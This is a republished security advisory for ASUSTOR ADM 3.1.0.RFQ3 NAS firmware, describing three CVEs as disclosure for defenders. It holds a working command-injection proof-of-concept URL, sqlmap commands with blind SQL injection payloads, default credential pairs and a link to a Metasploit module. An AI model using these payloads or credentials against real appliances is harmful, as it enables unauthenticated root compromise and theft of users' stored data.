asustor adm 3.1.0.rfq3 remote command execution sql injection

▸▸▸ Exploit & Vulnerability >>   webapps exploit & cgi vulnerability




asustor adm 3.1.0.rfq3 remote command execution sql injection Code Code...
				
Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds Vendor - https://www.asustor.com/ Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from multiple critical vulnerabilities. The vulnerabilities were submitted to Asustor in January and February 2018. Several follow-up requests were made in an attempt to obtain vendor acknowledgement, however no correspondance was ever received. Nevertheless, the vendor did patch the RCE issue in the 3.1.3 ADM release on May 31, 2018. Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3. ----------------------------------------------------------------------------------- CVE-2018-11510 Remote Command Execution (Unauthenticated) CWE-78 - Improper Neutralization of Special Elements used in an OS Command ASUSTOR ADM - 3.1.0.RFQ3 ------------------------------------------ Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an unauthenticated remote code execution vulnerability in the portal/apis/aggrecate_js.cgi file by embedding OS commands in the 'script' parameter. The application fails to santitize user input after the cgi file executes a call to a local shell script. Example POC: https://<IP>:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22 Exploitation of this vulnerability allows an attacker execution of arbitrary commands on the host operating system, as the root user, remotely and unauthenticated. This is a complete compromise of the appliance. Exploits with Metasploit module can be found here: https://github.com/mefulton/CVE-2018-11510/ ------------------------------------------------------------------------------------ CVE-2018-11511 Blind SQL Injections CWE-89: Improper Neutralization of Special Elements used in an SQL Command ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3 ------------------------------------------ Weakness : The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI. POC sqlmap -u "https://<IP>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql Parameter: album_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: album_id=106299411 AND 4644=4644&start=0&limit=100&order=name_asc&api=v2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: album_id=106299411 AND SLEEP(5)&start=0&limit=100&order=name_asc&api=v2 sqlmap -u "https://IP/photo-gallery/api/photo/search/" --data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2" --random-agent --dbms=mysql --risk=2 Parameter: scope (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: keyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2 ------------------------------------------------------------------------------------ CVE-2018-11509 Default credentials and remote access (Multiple Applications) CWE-255 Credentials Management ASUSTOR ADM 3.1.0.RFQ3 ------------------------------------------ Weakness : When the end user completes setup for the ASUSTOR Nas appliance, a single congratulations web page appears, usually on port 80, stating setup is complete. This "setup complete" web page however is served publicly, and is available to anyone with no authentication. >From this page it is possible to access all of the add-on applications the end usr installs on the NAS, which are available from their online repository, by simply browsing to each add-on directory. For many of these apps, for example phpmyadmin. virtualbox, owncloud, photo-gallery, etc., the files are installed under the /volume1/Web/ folder, which is t the same directory as the 'setup complete' page is located. URL http://<IP>/phpmyadmin/ username/password - root:admin URL http://<IP>/virtualbox/ username/password - admin:admin URL http://<IP>/wordpress/ setup file available The application does prompt the user to change the admin account for the NAS itself, however, the end user is never prompted to change the default passwords on the add-on applications. This allows an attacker root level access to the application which in turn can be used to upload a webshell onto the appliance. It also allow access to all data the end user uploads to the NAS. Furthermore, the NAS itself has a default account nvradmin, which has permission to log into the admin portal. While the nvradmin account does not have most admin permissions, it still allows an attacker to access many of the browser file functions, and gain a foothold on the appliance. URL http://<IP>:8001/portal/ username/password nvradmin:nvradmin An attacker can determine installed applications and attack default credentials that are not changed upon NAS initialization, which enables them to compromise end user data or gain root access on the appliance. ----------------------------------------------------------------------------------- [Researchers] Kyle Lovett - (twitter - @SquirrelBuddha) Matthew Fulton (twitter - @haqur) https://www.purehacking.com/blog/matthew-fulton/ https://github.com/mefulton/CVE-2018-11510/

Asustor adm 3.1.0.rfq3 remote command execution sql injection Vulnerability / Exploit Source : Asustor adm 3.1.0.rfq3 remote command execution sql injection



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.